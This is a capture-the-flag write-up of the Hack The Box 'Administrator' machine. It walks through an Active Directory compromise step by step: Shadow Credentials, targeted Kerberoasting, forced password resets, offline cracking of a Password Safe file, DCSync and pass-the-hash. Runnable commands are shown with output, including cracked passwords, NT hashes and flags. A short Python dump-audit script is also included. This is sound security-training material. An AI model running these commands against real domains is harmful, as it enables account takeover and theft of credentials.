Administrator — HackTheBox Writeup

Hello everyone! This time I will go through one of the Hack The Box machines, Administrator. The machine is all about Active Directory exploitation: abusing object ACLs (GenericAll, ForceChangePassword, GenericWrite) through Shadow Credentials, targeted Kerberoasting and password resets, and finishing with DCSync privileges.

Initial Scanning

As usual, the first step is to scan the target with nmap:

└─# nmap -sCV 10.10.11.42 -Pn -T5
Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-02-23 02:15 EST
Nmap scan report for 10.10.11.42
Host is up (0.052s latency).
Not shown: 988 closed tcp ports (reset)
PORT     STATE SERVICE       VERSION
21/tcp   open  ftp           Microsoft ftpd
| ftp-syst: 
|_  SYST: Windows_NT
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-23 13:58:12Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  tcpwrapped
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: administrator.htb0., Site: Default-First-Site-Name)
3269/tcp open  tcpwrapped
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

From the scan we can see the standard Active Directory ports open, including:

  • Port 21: FTP (Microsoft ftpd)
  • Port 53: DNS
  • Port 88: Kerberos
  • Port 389/636 and 3268/3269: LDAP, LDAPS and the Global Catalog
  • Port 445: SMB

The LDAP banner gives the domain administrator.htb and the host name DC, so the target is the domain controller itself. One thing to fix before touching any Kerberos tooling: the Kerberos banner reports a server time of 13:58Z while the scan started at 02:15 EST (07:15Z), a skew of several hours. Kerberos rejects requests outside a five-minute window (KRB_AP_ERR_SKEW), so sync the attacking box to the DC first (for example with ntpdate against 10.10.11.42).

Initial Access

As in an assumed-breach engagement, the box starts with a set of given credentials:

  • Username: olivia
  • Password: ichliebedich

Login with WinRM

First we validate the credentials against WinRM with netexec. Pwn3d! means olivia is allowed to open a remote PowerShell session; note that WinRM on 5985 answers even though it was not listed in the scan above:

└─# netexec winrm 10.10.11.42 -u olivia -p ichliebedich
WINRM       10.10.11.42     5985   DC               [*] Windows Server 2022 Build 20348 (name:DC) (domain:administrator.htb)
WINRM       10.10.11.42     5985   DC               [+] administrator.htb\olivia:ichliebedich (Pwn3d!)

Enumeration with BloodHound

Collecting data

We collect the domain data with netexec's built-in BloodHound collector over LDAP (--dns-server points name resolution at the DC so the collector can resolve the domain's hosts):

└─# netexec ldap 10.10.11.42 -u olivia -p ichliebedich --bloodhound --collection All --dns-server 10.10.11.42
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
LDAP        10.10.11.42     389    DC               [+] administrator.htb\olivia:ichliebedich 
LDAP        10.10.11.42     389    DC               Resolved collection methods: rdp, session, dcom, objectprops, group, psremote, acl, localadmin, trusts, container                                                 
LDAP        10.10.11.42     389    DC               Done in 00M 05S
LDAP        10.10.11.42     389    DC               Compressing output into /root/.nxc/logs/DC_10.10.11.42_2025-02-23_021951_bloodhound.zip

BloodHound analysis

After uploading the zip into BloodHound, we find that:

  • Olivia has GenericAll on the user Michael
  • GenericAll is full control of the object: we can reset Michael's password, write an SPN to him (targeted Kerberoasting) or write to msDS-KeyCredentialLink (Shadow Credentials)

Exploit Path 1: Michael (GenericAll)

Shadow Credentials Attack

We use PyWhisker to add a Shadow Credential to Michael: it generates a certificate and key pair and appends the public key to his msDS-KeyCredentialLink attribute, which GenericAll lets us write:

└─# python3 pywhisker.py -d "administrator.htb" -u "olivia" -p 'ichliebedich' --target "michael" --action "add"
[*] Searching for the target account
[*] Target user found: CN=Michael Williams,CN=Users,DC=administrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: 30982685-a67d-6c0b-561e-3f1442b276
[*] Updating the msDS-KeyCredentialLink attribute of michael
[+] Updated the msDS-KeyCredentialLink attribute of the target object
[*] Converting PEM -> PFX with cryptography: mnKHswaS.pfx
[+] PFX exportiert nach: mnKHswaS.pfx
[i] Passwort für PFX: Dit0PmmbpqOrbQTSsA4M

The exported PFX is what you would feed to PKINITtools (gettgtpkinit.py) to obtain a TGT as Michael through PKINIT and, from there, his NT hash; this writeup does not use it further. Keep in mind that the KeyCredential stays on the account until it is removed (pywhisker --action remove with the DeviceID printed above), which is exactly what a defender will look for in msDS-KeyCredentialLink. Instead, GenericAll is used a second way: write an SPN to Michael and Kerberoast him.

Targeted Kerberoasting

└─# python3 targetedKerberoast.py -v -d 'administrator.htb' -u 'olivia' -p ichliebedich
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[VERBOSE] SPN added successfully for (michael)
[+] Printing hash for (michael)
$krb5tgs$23$*michael$ADMINISTRATOR.HTB$administrator.htb/michael*$0fd630c7<hash>
[VERBOSE] SPN removed successfully for (michael)

Cracking this hash with rockyou fails, so we fall back on the bluntest use of GenericAll and reset Michael's password. On a real engagement this is the last resort: the owner is locked out of their own account and the reset is logged (event 4724), which is why the non-destructive options above are tried first:

└─# bloodyAD -u "olivia" -p "ichliebedich" -d "Administrator.htb" --host "10.10.11.42" set password "Michael" "12345678"
[+] Password changed successfully!

Log in as Michael

└─# evil-winrm -i administrator.htb -u michael -p 12345678
Evil-WinRM shell v3.7
*Evil-WinRM* PS C:\Users\michael\Documents> whoami
administrator\michael

Exploit Path 2: Benjamin (ForceChangePassword)

BloodHound shows that Michael has ForceChangePassword on Benjamin, i.e. the User-Force-Change-Password extended right, which allows resetting the password without knowing the current one:

Changing Benjamin's password

We reset it over SAMR with net rpc password; the command prints nothing when it succeeds:

└─# net rpc password benjamin 12345678 -U administrator.htb/michael%12345678 -S administrator.htb

Trying FTP access

We try the FTP server found in the scan with Benjamin's new password (12345678):

└─# ftp administrator.htb
Connected to administrator.htb.
220 Microsoft FTP Service
Name (administrator.htb:root): benjamin
331 Password required
Password: 
230 User logged in.
Remote system type is Windows_NT.
ftp> ls
229 Entering Extended Passive Mode (|||63739|)
125 Data connection already open; Transfer starting.
10-05-24  08:13AM                  952 Backup.psafe3
226 Transfer complete.

Retrieving Backup.psafe3

ftp> get Backup.psafe3
local: Backup.psafe3 remote: Backup.psafe3
229 Entering Extended Passive Mode (|||63750|)
125 Data connection already open; Transfer starting.
100% |***************************************************************************************************************|   952       45.09 KiB/s    00:00 ETA
226 Transfer complete.
952 bytes received in 00:00 (44.86 KiB/s)

Cracking the Password Safe database

Backup.psafe3 is a Password Safe V3 database; its key-stretching parameters sit in the file header, so the master password can be attacked offline. The hash was first extracted with pwsafe2john (shipped with John) into pwsafe.hash, then cracked with rockyou:

└─# john --wordlist=/usr/share/wordlists/rockyou.txt pwsafe.hash 
Created directory: /root/.john
Using default input encoding: UTF-8
Loaded 1 password hash (pwsafe, Password Safe [SHA256 128/128 AVX 4x])
Cost 1 (iteration count) is 2048 for all loaded hashes
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
tekieromucho     (Backu)     
1g 0:00:00:00 DONE (2025-02-23 09:40) 5.555g/s 45511p/s 45511c/s 45511C/s newzealand..whitetiger

Credentials from Password Safe

Opening the database with the recovered master password (tekieromucho) in Password Safe gives three sets of credentials:

  • Alexander = UrkIbago
  • Emily = UXLCI5iETUsI
  • Emma = WwANQWnmJnGV

User Flag: Emily

We log in as Emily to get the user flag:

└─# evil-winrm -i administrator.htb -u emily -p "UXLCI5iETUsI"
Evil-WinRM shell v3.7
*Evil-WinRM* PS C:\Users\emily\Documents> whoami
administrator\emily
*Evil-WinRM* PS C:\Users\emily\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\emily\Desktop> cat user.txt
7a2c0d643bf50a0feb16a058937f9303

Exploit Path 3: Ethan (GenericWrite)

BloodHound shows Emily has GenericWrite on Ethan. GenericWrite does not include a password reset, but it does allow writing attributes such as servicePrincipalName (targeted Kerberoasting) and msDS-KeyCredentialLink (Shadow Credentials):

Shadow Credentials Attack on Ethan

└─# python3 pywhisker.py -d administrator.htb -u emily -p "UXLCI5iETUsI" --target "ethan" --action "add"
[*] Searching for the target account
[*] Target user found: CN=Ethan Hunt,CN=Users,DC=administrator,DC=htb
[*] Generating certificate
[*] Certificate generated
[*] Generating KeyCredential
[*] KeyCredential generated with DeviceID: c36ede17-f520-9087-1768-0b6e34dff5
[*] Updating the msDS-KeyCredentialLink attribute of ethan
[+] Updated the msDS-KeyCredentialLink attribute of the target object

Targeted Kerberoasting of Ethan

As with Michael, the Shadow Credential is added but not used further; the SPN route is taken instead:

└─# python3 targetedKerberoast.py -u "emily" -p "UXLCI5iETUsI" -d "Administrator.htb" --dc-ip 10.10.11.42
[*] Starting kerberoast attacks
[*] Fetching usernames from Active Directory with LDAP
[+] Printing hash for (ethan)
$krb5tgs$23$*ethan$ADMINISTRATOR.HTB$Administrator.htb/ethan*$6d4310bbcf16a<hash>

Cracking Ethan's hash

└─# john ethan.hash --wordlist=/usr/share/wordlists/rockyou.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (krb5tgs, Kerberos 5 TGS etype 23 [MD4 HMAC-MD5 RC4])
Will run 8 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
limpbizkit       (?)     
1g 0:00:00:00 DONE (2025-02-23 09:54)

Verifying Ethan's credentials

└─# netexec smb administrator.htb -u ethan -p limpbizkit
SMB         10.10.11.42     445    DC               [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:administrator.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.42     445    DC               [+] administrator.htb\ethan:limpbizkit

Privilege Escalation: DCSync

BloodHound shows Ethan has DCSync rights, i.e. DS-Replication-Get-Changes and DS-Replication-Get-Changes-All on the domain object, which let him ask the DC to replicate every account's secrets to him:

DCSync to dump the hashes

secretsdump pulls the NTDS secrets through the DRSUAPI replication interface. The RemoteOperations error at the top is harmless: it is the separate attempt to grab SAM and LSA secrets over the remote registry, which ethan is not allowed to do; adding -just-dc skips that step. Note that michael and benjamin show the same NT hash because both passwords were set to 12345678 above: NT hashes are unsalted MD4 of the UTF-16LE password, so identical passwords give identical hashes, and the RID 500 hash below can be passed directly without cracking:

└─# impacket-secretsdump administrator.htb/ethan:limpbizkit@10.10.11.42

Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied 
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9c591d1cba2a649f23928a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\olivia:1108:aad3b435b51404eeaad3b435b51404ee:fbaa3e2294376dc0f5aeb6b41ffa52b7:::
administrator.htb\michael:1109:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
administrator.htb\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
administrator.htb\emily:1112:aad3b435b51404eeaad3b435b51404ee:eb200a2583a88ace2983ee5caa520f31:::
administrator.htb\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
administrator.htb\alexander:3601:aad3b435b51404eeaad3b435b51404ee:cdc9e5f3b0631aa3600e0bfec00a0199:::
administrator.htb\emma:3602:aad3b435b51404eeaad3b435b51404ee:11ecd72c969a57c34c819b41b54455c9:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
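Reading a dump by eye does not scale beyond a handful of accounts. As an added example (not from the writeup), the Python below parses secretsdump's domain\user:rid:lm:nt::: lines and reports what a post-DCSync audit looks for: the RID 500 hash to pass, accounts carrying the empty-password NT hash (Guest here), hash collisions that reveal password reuse (michael and benjamin, both 12345678), the krbtgt hash and machine accounts. The sample input is a subset of the lines printed above plus the error line, embedded to show that noise is skipped.

```python
"""Added example (not from the writeup): audit a secretsdump/DCSync dump for reuse and empty passwords.
SAMPLE_DUMP is a subset of the lines printed in the writeup plus one noise line; the parser is generic."""
import re
from collections import defaultdict

EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password
LINE_RE = re.compile(
    r"^(?:(?P<domain>[^\\:]+)\\)?(?P<user>[^:\\]+):(?P<rid>\d+):"
    r"(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$"
)

SAMPLE_DUMP = """\
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
Administrator:500:aad3b435b51404eeaad3b435b51404ee:3dc553ce4b9c591d1cba2a649f23928a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:1181ba47d45fa2c76385a82409cbfaf6:::
administrator.htb\\michael:1109:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
administrator.htb\\benjamin:1110:aad3b435b51404eeaad3b435b51404ee:259745cb123a52aa2e693aaacca2db52:::
administrator.htb\\ethan:1113:aad3b435b51404eeaad3b435b51404ee:5c2b9f97e0620c3d307de85a93179884:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:cf411ddad4807b5b4a275d31caa1d4b3:::
"""


def parse_dump(text: str):
    """One dict per credential line (domain, user, rid, lm, nt); status and error lines are skipped."""
    rows = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            row = m.groupdict()
            row["rid"] = int(row["rid"])
            row["nt"] = row["nt"].lower()
            rows.append(row)
    return rows


def audit_dump(rows):
    """Group by NT hash: because the hash is unsalted, equal hashes mean equal passwords."""
    by_nt = defaultdict(list)
    for r in rows:
        by_nt[r["nt"]].append(r["user"])
    return {
        "builtin_admin_nt": next((r["nt"] for r in rows if r["rid"] == 500), None),
        "krbtgt_nt": next((r["nt"] for r in rows if r["user"].lower() == "krbtgt"), None),
        "empty_password": [r["user"] for r in rows if r["nt"] == EMPTY_NT],
        "shared_hash": {nt: users for nt, users in by_nt.items() if len(users) > 1},
        "machine_accounts": [r["user"] for r in rows if r["user"].endswith("$")],
    }


if __name__ == "__main__":
    findings = audit_dump(parse_dump(SAMPLE_DUMP))
    for key, value in findings.items():
        print(f"{key}: {value}")
```

The shared-hash group is the finding with the most leverage on a real dump: every member of a group falls to a single crack or a single known password, and groups that include privileged or service accounts are where a pass-the-hash attempt goes first. The krbtgt hash is listed separately because it is the golden-ticket key and should be rotated twice after any DCSync compromise.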

Root Flag: Pass-the-Hash as Administrator

Evil-WinRM accepts the NT hash directly with -H, so no cracking is needed:

└─# evil-winrm -i administrator.htb -u administrator -H "3dc553ce4b9c591d1cba2a649f23928a"
Evil-WinRM shell v3.7
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami
administrator\administrator
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> cat root.txt
dfed0cdd8bc1d204243011520a921207

Conclusion

Administrator is a good example of an Active Directory attack chain built from several techniques:

  1. GenericAll privilege: used to take over Michael (Shadow Credentials and targeted Kerberoasting were tried first, then a password reset)
  2. ForceChangePassword privilege: used to take over Benjamin's account and reach FTP
  3. Password Safe cracking: recovered Emily's credentials from Backup.psafe3
  4. GenericWrite privilege: used to Kerberoast Ethan
  5. DCSync privilege: finally used to dump the Administrator NTLM hash and pass it

Full attack chain

Olivia (GenericAll) → Michael (ForceChangePassword) → Benjamin (FTP access) → 
Password Safe → Emily (GenericWrite) → Ethan (DCSync) → Administrator
